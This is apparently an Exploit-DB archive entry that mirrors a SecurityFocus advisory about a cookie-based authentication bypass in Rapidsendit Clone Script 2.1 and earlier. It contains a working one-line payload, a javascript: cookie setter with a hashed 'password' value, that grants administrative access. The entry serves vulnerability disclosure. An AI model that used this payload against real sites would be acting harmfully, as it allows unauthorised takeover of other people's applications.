exploit-db-mirror/platforms/php/webapps/34808.txt
Offensive Security 66d3c41613 Updated 09_30_2014
2014-09-30 04:44:44 +00:00

10 lines
No EOL
547 B
Text
Executable file

source: http://www.securityfocus.com/bid/43702/info
Rapidsendit Clone Script is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application; this may aid in further attacks.
Rapidsendit Clone Script 2.1 and prior are vulnerable.
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
696d29e0940a4957748fe3fc9efd22a3 = password